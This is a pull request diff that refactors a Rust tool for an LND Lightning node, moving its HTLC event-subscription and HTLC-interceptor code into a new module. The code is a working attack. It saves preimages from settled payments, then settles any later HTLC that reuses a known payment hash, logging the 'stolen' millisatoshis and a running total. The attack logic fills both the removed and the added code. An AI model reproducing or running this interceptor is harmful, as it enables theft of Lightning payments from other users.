### PR TITLE
Some code clean up

### DIFF
--- a/src/main.rs
+++ b/src/main.rs
@@ -6,6 +6,7 @@ mod redis;
 #[cfg(feature = "sled")]
 mod sled;
 mod storage;
+mod subscribers;
 
 use axum::response::Html;
 use axum::routing::get;
@@ -20,8 +21,7 @@ use crate::redis::RedisStorage;
 use crate::sled::SledStorage;
 
 use crate::storage::Storage;
-use sha2::Digest;
-use sha2::Sha256;
+use crate::subscribers::*;
 use tokio::sync::Mutex;
 use tokio::task::spawn;
 
@@ -56,57 +56,15 @@ async fn main() {
         .expect("failed to connect");
     let client_router = client.router().clone();
 
-    let info = client
-        .lightning()
-        // All calls require at least empty parameter
-        .get_info(tonic_openssl_lnd::lnrpc::GetInfoRequest {})
-        .await
-        .expect("failed to get info")
-        .into_inner();
-
-    // We only print it here, note that in real-life code you may want to call `.into_inner()` on
-    // the response to get the message.
-    println!("{:#?}", info.alias);
-
     let storage = load_storage(args);
 
     // HTLC event stream part
     println!("starting htlc event subscription");
-    let mut client_router_htlc_event = client_router.clone();
+    let client_router_htlc_event = client_router.clone();
     let storage_htlc_event = storage.clone();
+
     spawn(async move {
-        let mut htlc_event_stream = client_router_htlc_event
-            .subscribe_htlc_events(tonic_openssl_lnd::routerrpc::SubscribeHtlcEventsRequest {})
-            .await
-            .expect("Failed to call subscribe_htlc_events")
-            .into_inner();
-
-        while let Some(htlc_event) = htlc_event_stream
-            .message()
-            .await
-            .expect("Failed to receive invoices")
-        {
-            println!("{:#?}", htlc_event);
-            if let Some(tonic_openssl_lnd::routerrpc::htlc_event::Event::SettleEvent(
-                settle_event,
-            )) = htlc_event.event
-            {
-                let mut hasher = Sha256::new();
-                hasher.update(&settle_event.preimage);
-                let payment_hash = hasher.finalize();
-                println!(
-                    "got preimage {} from payment hash {}",
-                    hex::encode(settle_event.preimage.clone()),
-                    hex::encode(payment_hash)
-                );
-
-                storage_htlc_event
-                    .clone()
-                    .lock()
-                    .await
-                    .set(settle_event.preimage, payment_hash.to_vec());
-            };
-        }
+        start_htlc_event_subscription(client_router_htlc_event, storage_htlc_event).await
     });
 
     println!("started htlc event subscription");
@@ -114,59 +72,8 @@ async fn main() {
     // HTLC interceptor part
     println!("starting HTLC interception");
     let storage_htlc_interceptor = storage.clone();
-    spawn(async move {
-        let mut client_router_htlc_intercept = client_router.clone();
-        let (tx, rx) = tokio::sync::mpsc::channel::<
-            tonic_openssl_lnd::routerrpc::ForwardHtlcInterceptResponse,
-        >(1024);
-        let stream = tokio_stream::wrappers::ReceiverStream::new(rx);
 
-        let mut htlc_stream = client_router_htlc_intercept
-            .htlc_interceptor(stream)
-            .await
-            .expect("Failed to call htlc_interceptor")
-            .into_inner();
-
-        while let Some(htlc) = htlc_stream
-            .message()
-            .await
-            .expect("Failed to receive HTLCs")
-        {
-            println!("htlc {:?}", htlc);
-
-            let map = storage_htlc_interceptor.clone();
-            let mut db = map.lock().await;
-            let response = match db.get(htlc.payment_hash) {
-                Some(preimage) => {
-                    let steal_amt = htlc.incoming_amount_msat;
-                    println!("HTLC preimage saved! Stealing {steal_amt} msats...");
-
-                    let total = db.add_stolen(steal_amt);
-                    println!("New total amount stolen: {total} msats");
-
-                    tonic_openssl_lnd::routerrpc::ForwardHtlcInterceptResponse {
-                        incoming_circuit_key: htlc.incoming_circuit_key,
-                        action: 0, // 0 settle, 1 fail, 2 resume
-                        preimage: preimage.to_vec(),
-                        failure_code: 0,
-                        failure_message: vec![],
-                    }
-                }
-                None => {
-                    println!("Do not have HTLC preimage, resuming");
-                    tonic_openssl_lnd::routerrpc::ForwardHtlcInterceptResponse {
-                        incoming_circuit_key: htlc.incoming_circuit_key,
-                        action: 2, // 0 settle, 1 fail, 2 resume
-                        preimage: vec![],
-                        failure_code: 0,
-                        failure_message: vec![],
-                    }
-                }
-            };
-
-            tx.send(response).await.unwrap();
-        }
-    });
+    spawn(async move { start_htlc_interceptor(client_router, storage_htlc_interceptor).await });
 
     println!("started htlc event interception");
 

--- a/src/subscribers.rs
+++ b/src/subscribers.rs
@@ -1,0 +1,110 @@
+use std::sync::Arc;
+
+use sha2::Digest;
+use sha2::Sha256;
+use tokio::sync::Mutex;
+use tonic_openssl_lnd::LndRouterClient;
+
+use crate::storage::Storage;
+
+pub async fn start_htlc_event_subscription(
+    mut lnd: LndRouterClient,
+    storage: Arc<Mutex<dyn Storage + Send>>,
+) {
+    let mut htlc_event_stream = lnd
+        .subscribe_htlc_events(tonic_openssl_lnd::routerrpc::SubscribeHtlcEventsRequest {})
+        .await
+        .expect("Failed to call subscribe_htlc_events")
+        .into_inner();
+
+    while let Some(htlc_event) = htlc_event_stream
+        .message()
+        .await
+        .expect("Failed to receive invoices")
+    {
+        if let Some(tonic_openssl_lnd::routerrpc::htlc_event::Event::SettleEvent(settle_event)) =
+            htlc_event.event
+        {
+            let mut hasher = Sha256::new();
+            hasher.update(&settle_event.preimage);
+            let payment_hash = hasher.finalize();
+            println!(
+                "got preimage {} from payment hash {}",
+                hex::encode(settle_event.preimage.clone()),
+                hex::encode(payment_hash)
+            );
+
+            storage
+                .clone()
+                .lock()
+                .await
+                .set(settle_event.preimage, payment_hash.to_vec());
+        };
+    }
+}
+
+enum InterceptorAction {
+    /// Settle the HTLC with the given preimage
+    Settle = 0,
+
+    #[allow(unused)]
+    /// Fail the HTLC with the given failure code and message
+    Fail = 1,
+
+    /// Allow lnd to make the decision about the HTLC
+    Resume = 2,
+}
+
+pub async fn start_htlc_interceptor(lnd: LndRouterClient, storage: Arc<Mutex<dyn Storage + Send>>) {
+    let mut router = lnd.clone();
+    let (tx, rx) = tokio::sync::mpsc::channel::<
+        tonic_openssl_lnd::routerrpc::ForwardHtlcInterceptResponse,
+    >(1024);
+    let stream = tokio_stream::wrappers::ReceiverStream::new(rx);
+
+    let mut htlc_stream = router
+        .htlc_interceptor(stream)
+        .await
+        .expect("Failed to call htlc_interceptor")
+        .into_inner();
+
+    while let Some(htlc) = htlc_stream
+        .message()
+        .await
+        .expect("Failed to receive HTLCs")
+    {
+        println!("Received HTLC {}!", hex::encode(&htlc.payment_hash));
+
+        let map = storage.clone();
+        let mut db = map.lock().await;
+        let response = match db.get(htlc.payment_hash) {
+            Some(preimage) => {
+                let steal_amt = htlc.incoming_amount_msat;
+                println!("HTLC preimage saved! Stealing {steal_amt} msats...");
+
+                let total = db.add_stolen(steal_amt);
+                println!("New total amount stolen: {total} msats");
+
+                tonic_openssl_lnd::routerrpc::ForwardHtlcInterceptResponse {
+                    incoming_circuit_key: htlc.incoming_circuit_key,
+                    action: InterceptorAction::Settle as i32,
+                    preimage: preimage.to_vec(),
+                    failure_code: 0,
+                    failure_message: vec![],
+                }
+            }
+            None => {
+                println!("Do not have HTLC preimage, resuming");
+                tonic_openssl_lnd::routerrpc::ForwardHtlcInterceptResponse {
+                    incoming_circuit_key: htlc.incoming_circuit_key,
+                    action: InterceptorAction::Resume as i32,
+                    preimage: vec![],
+                    failure_code: 0,
+                    failure_message: vec![],
+                }
+            }
+        };
+
+        tx.send(response).await.unwrap();
+    }
+}


### PR DESCRIPTION
Moved the actual application logic into a separate file, this should make the code much easier to reason about. Also removed some debug code like calling `get_info` on startup and printing the full output of every htlc received.